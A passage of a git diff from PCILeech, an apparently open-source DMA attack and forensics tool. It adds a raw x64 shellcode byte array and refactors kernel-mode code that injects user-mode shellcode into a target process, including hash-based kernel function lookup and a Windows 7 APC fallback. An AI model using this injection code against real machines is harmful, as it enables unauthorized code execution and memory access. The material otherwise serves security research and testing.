+		0x00, 0x00, 0xc7, 0x40, 0x3c, 0x00, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x13,
+		0x48, 0x83, 0xba, 0x08, 0x01, 0x00, 0x00, 0x00, 0x74, 0x18, 0x48, 0x8b,
+		0x4b, 0x60, 0x48, 0x89, 0x48, 0x58, 0x48, 0x8b, 0x4b, 0x68, 0x48, 0x89,
+		0x48, 0x50, 0x48, 0x8b, 0x4b, 0x60, 0x48, 0x89, 0x48, 0x60, 0x48, 0x8b,
+		0x13, 0x48, 0x8d, 0x4c, 0x24, 0x50, 0x48, 0x89, 0x4c, 0x24, 0x48, 0x45,
+		0x33, 0xc9, 0x48, 0x89, 0x44, 0x24, 0x40, 0x45, 0x33, 0xc0, 0x48, 0x83,
+		0x64, 0x24, 0x38, 0x00, 0x33, 0xc9, 0x48, 0x83, 0x64, 0x24, 0x30, 0x00,
+		0x8b, 0x82, 0x10, 0x01, 0x00, 0x00, 0x89, 0x44, 0x24, 0x28, 0xc7, 0x44,
+		0x24, 0x20, 0x01, 0x00, 0x00, 0x00, 0xff, 0x53, 0x18, 0x85, 0xc0, 0x74,
+		0x26, 0x48, 0x8b, 0x4c, 0x24, 0x50, 0x48, 0x89, 0x8b, 0x80, 0x00, 0x00,
+		0x00, 0x48, 0x8b, 0x0b, 0x48, 0x83, 0xb9, 0x08, 0x01, 0x00, 0x00, 0x00,
+		0x74, 0x08, 0x48, 0x8b, 0x4c, 0x24, 0x58, 0xff, 0x53, 0x08, 0xb8, 0x01,
+		0x00, 0x00, 0x00, 0x48, 0x83, 0xc4, 0x70, 0x5b, 0xc3, 0xcc, 0xcc, 0xcc,
+		0x48, 0x8b, 0xc4, 0x48, 0x89, 0x58, 0x08, 0x48, 0x89, 0x68, 0x10, 0x48,
+		0x89, 0x70, 0x18, 0x57, 0x48, 0x83, 0xec, 0x50, 0x48, 0x8b, 0xe9, 0xc7,
+		0x40, 0xc8, 0xfb, 0x97, 0xfd, 0x0f, 0xc7, 0x40, 0xcc, 0x80, 0x8f, 0x0c,
+		0x17, 0x48, 0x8d, 0x7a, 0x48, 0xc7, 0x40, 0xd0, 0x72, 0xfe, 0xb3, 0x16,
+		0x48, 0x8d, 0x70, 0xec, 0xc7, 0x40, 0xd4, 0x6b, 0xd0, 0x2b, 0xca, 0xbb,
+		0x09, 0x00, 0x00, 0x00, 0xc7, 0x40, 0xd8, 0x74, 0xab, 0x30, 0xac, 0xc7,
+		0x40, 0xdc, 0xfa, 0x97, 0x02, 0x4c, 0xc7, 0x40, 0xe0, 0x16, 0x65, 0xfa,
+		0x10, 0xc7, 0x40, 0xe4, 0xb0, 0x49, 0x2d, 0xdb, 0xc7, 0x40, 0xe8, 0x1f,
+		0x79, 0x0a, 0xe8, 0x48, 0x8d, 0x76, 0xfc, 0x48, 0x8b, 0xcd, 0x8b, 0x16,
+		0x48, 0x8d, 0x7f, 0xf8, 0xe8, 0xeb, 0xfd, 0xff, 0xff, 0x48, 0x89, 0x07,
+		0x83, 0xc3, 0xff, 0x75, 0xe6, 0x48, 0x8b, 0x5c, 0x24, 0x60, 0x48, 0x8b,
+		0x6c, 0x24, 0x68, 0x48, 0x8b, 0x74, 0x24, 0x70, 0x48, 0x83, 0xc4, 0x50,
+		0x5f, 0xc3, 0xcc, 0xcc, 0x48, 0x83, 0xec, 0x28, 0x48, 0x8b, 0xc1, 0x48,
+		0x8d, 0x54, 0x24, 0x30, 0x48, 0x8b, 0x89, 0x80, 0x00, 0x00, 0x00, 0xff,
+		0x50, 0x28, 0x33, 0xc9, 0x85, 0xc0, 0x74, 0x0f, 0x81, 0x7c, 0x24, 0x30,
+		0x03, 0x01, 0x00, 0x00, 0x75, 0x05, 0xb9, 0x01, 0x00, 0x00, 0x00, 0x8b,
+		0xc1, 0x48, 0x83, 0xc4, 0x28, 0xc3, 0xcc, 0xcc, 0x48, 0x89, 0x5c, 0x24,
+		0x10, 0x56, 0x48, 0x83, 0xec, 0x30, 0x83, 0xb9, 0x88, 0x00, 0x00, 0x00,
+		0x00, 0x48, 0x8b, 0xd9, 0x0f, 0x84, 0xab, 0x00, 0x00, 0x00, 0xbe, 0x00,
+		0x08, 0x00, 0x00, 0x48, 0x8b, 0xcb, 0xe8, 0xa5, 0xff, 0xff, 0xff, 0x85,
+		0xc0, 0x0f, 0x84, 0x96, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x43, 0x70, 0x4c,
+		0x8b, 0x4b, 0x78, 0x48, 0x83, 0x64, 0x24, 0x20, 0x00, 0x8b, 0x48, 0x10,
+		0x41, 0x8b, 0x51, 0x08, 0x81, 0xe1, 0xff, 0x07, 0x00, 0x00, 0x81, 0xe2,
+		0xff, 0x07, 0x00, 0x00, 0x3b, 0xca, 0x8b, 0xc2, 0x48, 0x8b, 0x4b, 0x58,
+		0x77, 0x08, 0x44, 0x8b, 0xc6, 0x44, 0x2b, 0xc2, 0xeb, 0x03, 0x45, 0x33,
+		0xc0, 0x49, 0x8d, 0x51, 0x68, 0x48, 0x03, 0xd0, 0x4c, 0x8d, 0x4c, 0x24,
+		0x40, 0xff, 0x53, 0x38, 0x85, 0xc0, 0x74, 0x4d, 0x48, 0x8b, 0x4b, 0x78,
+		0x8b, 0x44, 0x24, 0x40, 0x48, 0x01, 0x41, 0x08, 0xeb, 0x1d, 0x83, 0xbb,
+		0x88, 0x00, 0x00, 0x00, 0x00, 0x74, 0x36, 0x48, 0x8b, 0xcb, 0xe8, 0x35,
+		0xff, 0xff, 0xff, 0x85, 0xc0, 0x74, 0x1d, 0xb9, 0x0a, 0x00, 0x00, 0x00,
+		0xff, 0x53, 0x40, 0x48, 0x8b, 0x4b, 0x78, 0x48, 0x8b, 0x43, 0x70, 0x48,
+		0x8b, 0x49, 0x08, 0x48, 0x2b, 0x48, 0x10, 0x48, 0x3b, 0xce, 0x73, 0xce,
+		0x83, 0xbb, 0x88, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x85, 0x5a, 0xff, 0xff,
+		0xff, 0x48, 0x8b, 0xcb, 0xe8, 0x5b, 0xfd, 0xff, 0xff, 0x48, 0x8b, 0x5c,
+		0x24, 0x48, 0x48, 0x83, 0xc4, 0x30, 0x5e, 0xc3, 0x40, 0x53, 0x48, 0x83,
+		0xec, 0x30, 0x83, 0xb9, 0x88, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xd9,
+		0x74, 0x78, 0x48, 0x8b, 0xcb, 0xe8, 0xda, 0xfe, 0xff, 0xff, 0x85, 0xc0,
+		0x74, 0x6c, 0x48, 0x8b, 0x53, 0x78, 0x48, 0x8b, 0x4b, 0x70, 0x48, 0x8b,
+		0x42, 0x10, 0x48, 0x39, 0x41, 0x08, 0x75, 0x0a, 0xb9, 0x0a, 0x00, 0x00,
+		0x00, 0xff, 0x53, 0x40, 0xeb, 0x47, 0x44, 0x8b, 0x41, 0x08, 0x48, 0x8d,
+		0x51, 0x68, 0x48, 0x83, 0x64, 0x24, 0x20, 0x00, 0x4c, 0x8d, 0x4c, 0x24,
+		0x40, 0x48, 0x8b, 0x4b, 0x50, 0x25, 0xff, 0x07, 0x00, 0x00, 0x41, 0x81,
+		0xe0, 0xff, 0x07, 0x00, 0x00, 0x48, 0x03, 0xd0, 0x41, 0x3b, 0xc0, 0x72,
+		0x06, 0x41, 0xb8, 0x00, 0x08, 0x00, 0x00, 0x44, 0x2b, 0xc0, 0xff, 0x53,
+		0x48, 0x85, 0xc0, 0x74, 0x15, 0x48, 0x8b, 0x4b, 0x78, 0x8b, 0x44, 0x24,
+		0x40, 0x48, 0x01, 0x41, 0x10, 0x83, 0xbb, 0x88, 0x00, 0x00, 0x00, 0x00,
+		0x75, 0x88, 0x48, 0x8b, 0xcb, 0xe8, 0xbe, 0xfc, 0xff, 0xff, 0x48, 0x83,
+		0xc4, 0x30, 0x5b, 0xc3, 0x48, 0x89, 0x5c, 0x24, 0x08, 0x48, 0x89, 0x74,
+		0x24, 0x10, 0x57, 0x48, 0x83, 0xec, 0x50, 0x48, 0x8b, 0xfa, 0x48, 0x8b,
+		0xd9, 0x48, 0x8b, 0xcf, 0xba, 0xfa, 0x97, 0x02, 0x4c, 0xe8, 0x06, 0xfc,
+		0xff, 0xff, 0xba, 0x90, 0x00, 0x00, 0x00, 0x8d, 0x4a, 0xb0, 0xff, 0xd0,
+		0x48, 0x8d, 0x8b, 0xe8, 0x0e, 0x00, 0x00, 0x48, 0x8b, 0xf0, 0x48, 0x89,
+		0x08, 0x48, 0x8d, 0x50, 0x08, 0x48, 0x8b, 0xcf, 0xe8, 0x83, 0xfd, 0xff,
+		0xff, 0x48, 0x8b, 0x0e, 0x48, 0x83, 0xb9, 0x08, 0x01, 0x00, 0x00, 0x00,
+		0x74, 0x7b, 0x48, 0x83, 0x64, 0x24, 0x38, 0x00, 0x4c, 0x8d, 0x44, 0x24,
+		0x30, 0xc7, 0x44, 0x24, 0x30, 0x18, 0x00, 0x00, 0x00, 0x48, 0xba, 0x21,
+		0x95, 0xef, 0xdf, 0x32, 0x12, 0x65, 0x12, 0xbf, 0x01, 0x00, 0x00, 0x00,
+		0xbb, 0x00, 0x08, 0x00, 0x00, 0x89, 0x7c, 0x24, 0x40, 0x44, 0x8b, 0xcb,
+		0x48, 0x8b, 0x06, 0x48, 0x8b, 0x88, 0x08, 0x01, 0x00, 0x00, 0x48, 0x89,
+		0x4e, 0x70, 0x48, 0x8b, 0x80, 0x08, 0x01, 0x00, 0x00, 0x48, 0x05, 0x00,
+		0x10, 0x00, 0x00, 0x48, 0x89, 0x46, 0x78, 0x48, 0x89, 0x11, 0x48, 0x8d,
+		0x4e, 0x68, 0x48, 0x8b, 0x46, 0x78, 0x48, 0x89, 0x10, 0x48, 0x8d, 0x56,
+		0x50, 0xff, 0x56, 0x10, 0x48, 0x8d, 0x56, 0x60, 0x44, 0x8b, 0xcb, 0x48,
+		0x8d, 0x4e, 0x58, 0x4c, 0x8d, 0x44, 0x24, 0x30, 0xff, 0x56, 0x10, 0x89,
+		0xbe, 0x88, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xce, 0xe8, 0x3f, 0xfc, 0xff,
+		0xff, 0x85, 0xc0, 0x75, 0x0a, 0x48, 0x8b, 0xce, 0xe8, 0xd7, 0xfb, 0xff,
+		0xff, 0xeb, 0x45, 0x48, 0x8b, 0x06, 0x48, 0x83, 0xb8, 0x08, 0x01, 0x00,
+		0x00, 0x00, 0x74, 0x38, 0x48, 0x83, 0x64, 0x24, 0x28, 0x00, 0x4c, 0x8d,
+		0x05, 0x6b, 0xfe, 0xff, 0xff, 0x83, 0x64, 0x24, 0x20, 0x00, 0x4c, 0x8b,
+		0xce, 0x33, 0xd2, 0x33, 0xc9, 0xff, 0x56, 0x20, 0x48, 0x83, 0x64, 0x24,
+		0x28, 0x00, 0x4c, 0x8d, 0x05, 0x77, 0xfd, 0xff, 0xff, 0x83, 0x64, 0x24,
+		0x20, 0x00, 0x4c, 0x8b, 0xce, 0x33, 0xd2, 0x33, 0xc9, 0xff, 0x56, 0x20,
+		0x48, 0x8b, 0x5c, 0x24, 0x60, 0x48, 0x8b, 0x74, 0x24, 0x68, 0x48, 0x83,
+		0xc4, 0x50, 0x5f, 0xc3
 	};
-	unsigned int wx64_exec_user_bin_len = 1539;
+	*ppb = wx64_exec_user_bin; // user data
+	*pcb = sizeof(wx64_exec_user_bin);
+}
+#endif /* ! _EXEC_USER_EXTERNAL */
+
+#ifdef _EXEC_USER_EXTERNAL
+VOID GetUserExecShellcode(_In_ PKMDDATA pk, _Out_ PBYTE *ppb, _Out_ PDWORD pcb)
+{
+	*ppb = pk->ReservedKMD[2]; // user data
+	*pcb = 0x1000 - (pk->ReservedKMD[2] & 0xfff);
+}
+#endif /* _EXEC_USER_EXTERNAL */
+
+//----------------------------------------------------------------------------------------------------------
+// USER MODE CODE SETUP BELOW:
+//----------------------------------------------------------------------------------------------------------
+
+NTSTATUS IntializeUserModeCode(_In_ PKMDDATA pk, _In_ PKERNEL_FUNCTIONS fnk, _In_ PKERNEL_FUNCTIONS2 fnk2, PBYTE pb, QWORD qwAddrConsoleBuffer)
+{
+	PBYTE pbCodeUser;
+	DWORD cbCodeUser;
+	GetUserExecShellcode(pk, &pbCodeUser, &cbCodeUser);
+
+	pk->ReservedKMD[4] = 0x7777666677776666;
+	pk->ReservedKMD[5] = pbCodeUser;
+	pk->ReservedKMD[6] = cbCodeUser;
+	pk->ReservedKMD[6] = *(PQWORD)pbCodeUser;
 
 	PUSERSHELL_CONFIG pCfg = (PUSERSHELL_CONFIG)(pb + 0x1000 - sizeof(USERSHELL_CONFIG));
 	SIZE_T cchProcToStart = fnk2->strnlen(pk->dataInStr, MAX_PATH);
@@ -395,7 +407,7 @@ NTSTATUS IntializeUserModeCode(_In_ PKMDDATA pk, _In_ PKERNEL_FUNCTIONS fnk, _In
 		return E_INVALIDARG;
 	}
 	fnk->RtlZeroMemory(pb, 0x1000);
-	fnk->RtlCopyMemory(pb, wx64_exec_user_bin, wx64_exec_user_bin_len);
+	fnk->RtlCopyMemory(pb, pbCodeUser, cbCodeUser);
 	fnk->RtlCopyMemory(pCfg->szProcToStart, pk->dataInStr, MAX_PATH);
 	pCfg->fCreateProcess = (DWORD)pk->dataIn[1];
 	pCfg->qwAddrConsoleBuffer = qwAddrConsoleBuffer;
@@ -444,6 +456,7 @@ QWORD SetupConsoleBufferUserMode(_In_ PKMDDATA pk, _In_ PKERNEL_FUNCTIONS fnk, _
 //----------------------------------------------------------------------------------------------------------
 // Windows 7 APC ROUTINES BELOW (WORKAROUND FOR MISSING ntoskrnl!RtlCreateUserThread).
 //----------------------------------------------------------------------------------------------------------
+#ifdef _WIN7_COMPAT
 
 /*
 * The KernelApcRoutine is called after the user mode APC is completed. 
@@ -614,6 +627,7 @@ VOID ActionDefault_QueueApcState(_In_ PKMDDATA pk, _In_ PKERNEL_FUNCTIONS fnk, _
 fail:
 	if(pKApc) { fnk->ExFreePool(pKApc);	}
 }
+#endif /* _WIN7_COMPAT */
 
 //----------------------------------------------------------------------------------------------------------
 // MAIN CODE BELOW:
@@ -692,12 +706,15 @@ VOID ActionDefault(_In_ PKMDDATA pk, _In_ PKERNEL_FUNCTIONS fnk, _In_ PKERNEL_FU
 			goto fail;
 		}
 		CommonSleep(fnk, 250);
-	} else {
+	} 
+#ifdef _WIN7_COMPAT
+	else {
 		// Windows 7 fallback to more complicated KeInsertQueueApc method.
 		ActionDefault_QueueApcState(pk, fnk, fnk2, Process, ApcState, pvAddressUserMode);
 	}
+#endif /* _WIN7_COMPAT */
 fail:
-	if(ZwProcessHandle) { fnk2->ZwClose(ZwProcessHandle); }
+	if(ZwProcessHandle) { fnk->ZwClose(ZwProcessHandle); }
 	if(Process) { fnk2->ObDereferenceObject(Process); }
 }
 
diff --git a/pcileech_shellcode/wx64_stage3_c.c b/pcileech_shellcode/wx64_stage3_c.c
index b7e9310..740481a 100644
--- a/pcileech_shellcode/wx64_stage3_c.c
+++ b/pcileech_shellcode/wx64_stage3_c.c
@@ -1,6 +1,6 @@
 // wx64_stage3_c.c : stage3 main shellcode.
 //
-// (c) Ulf Frisk, 2016
+// (c) Ulf Frisk, 2016, 2017
 // Author: Ulf Frisk, pcileech@frizk.net
 //
 #include <windows.h>
@@ -140,30 +140,30 @@ typedef struct tdNTOS {
 * KMD DATA struct. This struct must be contained in a 4096 byte section (page).
 * This page/struct is used to communicate between the inserted kernel code and
 * the pcileech program.
-* VNR: 002
+* VNR: 003
 */
 typedef struct tdKMDDATA {
 	QWORD MAGIC;					// [0x000] magic number 0x0ff11337711333377.
-	QWORD AddrKernelBase;			// [0x008] pre-filled by stage2, virtual address of KERNEL HEADER (WINDOWS/OSX).
+	QWORD AddrKernelBase;			// [0x008] pre-filled by stage2, virtual address of kernel header (WINDOWS/MACOS).
 	QWORD AddrKallsymsLookupName;	// [0x010] pre-filled by stage2, virtual address of kallsyms_lookup_name (LINUX).
 	QWORD DMASizeBuffer;			// [0x018] size of DMA buffer.
 	QWORD DMAAddrPhysical;			// [0x020] physical address of DMA buffer.
 	QWORD DMAAddrVirtual;			// [0x028] virtual address of DMA buffer.
 	QWORD _status;					// [0x030] status of operation
 	QWORD _result;					// [0x038] result of operation TRUE|FALSE
-	QWORD _address;					// [0x040] virtual address to operate on.
+	QWORD _address;					// [0x040] address to operate on.
 	QWORD _size;					// [0x048] size of operation / data in DMA buffer.
 	QWORD OperatingSystem;			// [0x050] operating system type
-	QWORD ReservedKMD;				// [0x058] reserved for specific kmd data (dependant on KMD version).
-	QWORD ReservedFutureUse1[20];	// [0x060] reserved for future use.
+	QWORD ReservedKMD[8];			// [0x058] reserved for specific kmd data (dependant on KMD version).
+	QWORD ReservedFutureUse1[13];	// [0x098] reserved for future use.
 	QWORD dataInExtraLength;		// [0x100] length of extra in-data.
 	QWORD dataInExtraOffset;		// [0x108] offset from DMAAddrPhysical/DMAAddrVirtual.
 	QWORD dataInExtraLengthMax;		// [0x110] maximum length of extra in-data. 
 	QWORD dataInConsoleBuffer;		// [0x118] physical address of 1-page console buffer.
 	QWORD dataIn[28];				// [0x120]
-	QWORD dataOutExtraLength;		// [0x200] length of extra in-data.
+	QWORD dataOutExtraLength;		// [0x200] length of extra out-data.
 	QWORD dataOutExtraOffset;		// [0x208] offset from DMAAddrPhysical/DMAAddrVirtual.
-	QWORD dataOutExtraLengthMax;	// [0x210] maximum length of extra in-data. 
+	QWORD dataOutExtraLengthMax;	// [0x210] maximum length of extra out-data. 
 	QWORD dataOutConsoleBuffer;		// [0x218] physical address of 1-page console buffer.
 	QWORD dataOut[28];				// [0x220]
 	NTOS fn;						// [0x300] used by shellcode to store function pointers.
@@ -227,17 +227,22 @@ VOID stage3_c_EntryPoint(PKMDDATA pk)
 {
 	pk->MAGIC = 0x0ff11337711333377;
 	pk->OperatingSystem = KMDDATA_OPERATING_SYSTEM_WINDOWS;
-	pk->fn.ExFreePool = PEGetProcAddressH(pk->AddrKernelBase, H_ExFreePool);
-	pk->fn.MmFreeContiguousMemory = PEGetProcAddressH(pk->AddrKernelBase, H_MmFreeContiguousMemory);
-	pk->fn.MmAllocateContiguousMemory = PEGetProcAddressH(pk->AddrKernelBase, H_MmAllocateContiguousMemory);
-	pk->fn.MmGetPhysicalAddress = PEGetProcAddressH(pk->AddrKernelBase, H_MmGetPhysicalAddress);
-	pk->fn.MmGetPhysicalMemoryRanges = PEGetProcAddressH(pk->AddrKernelBase, H_MmGetPhysicalMemoryRanges);
-	pk->fn.MmMapIoSpace = PEGetProcAddressH(pk->AddrKernelBase, H_MmMapIoSpace);
-	pk->fn.MmUnmapIoSpace = PEGetProcAddressH(pk->AddrKernelBase, H_MmUnmapIoSpace);
-	pk->fn.PsCreateSystemThread = PEGetProcAddressH(pk->AddrKernelBase, H_PsCreateSystemThread);
-	pk->fn.RtlCopyMemory = PEGetProcAddressH(pk->AddrKernelBase, H_RtlCopyMemory);
-	pk->fn.ZwProtectVirtualMemory = PEGetProcAddressH(pk->AddrKernelBase, H_ZwProtectVirtualMemory);
-	pk->fn.KeDelayExecutionThread = PEGetProcAddressH(pk->AddrKernelBase, H_KeDelayExecutionThread);
+	DWORD i = 0, NAMES[32];
+	NAMES[i++] = H_ExFreePool;
+	NAMES[i++] = H_MmFreeContiguousMemory;
+	NAMES[i++] = H_MmAllocateContiguousMemory;
+	NAMES[i++] = H_MmGetPhysicalAddress;
+	NAMES[i++] = H_MmGetPhysicalMemoryRanges;
+	NAMES[i++] = H_MmMapIoSpace;
+	NAMES[i++] = H_MmUnmapIoSpace;
+	NAMES[i++] = H_PsCreateSystemThread;
+	NAMES[i++] = H_RtlCopyMemory;
+	NAMES[i++] = H_ZwProtectVirtualMemory;
+	NAMES[i++] = H_KeDelayExecutionThread;
+	while(i) {
+		i--;
+		*((PQWORD)&pk->fn + i) = PEGetProcAddressH(pk->AddrKernelBase, NAMES[i]);
+	}
 	stage3_c_MainCommandLoop(pk);
 }
 
diff --git a/readme.md b/readme.md
index ad2cb31..d185bad 100644
--- a/readme.md
+++ b/readme.md
@@ -220,3 +220,7 @@ v2.4
 v2.5
 * SP605/FT601: re-designed and improved. NB! FPGA device have to be re-flashed with new bitstream!
 * SP605/TCP: bug fixes.
+
+Latest
+* Display command added.
+* Various bug fixes.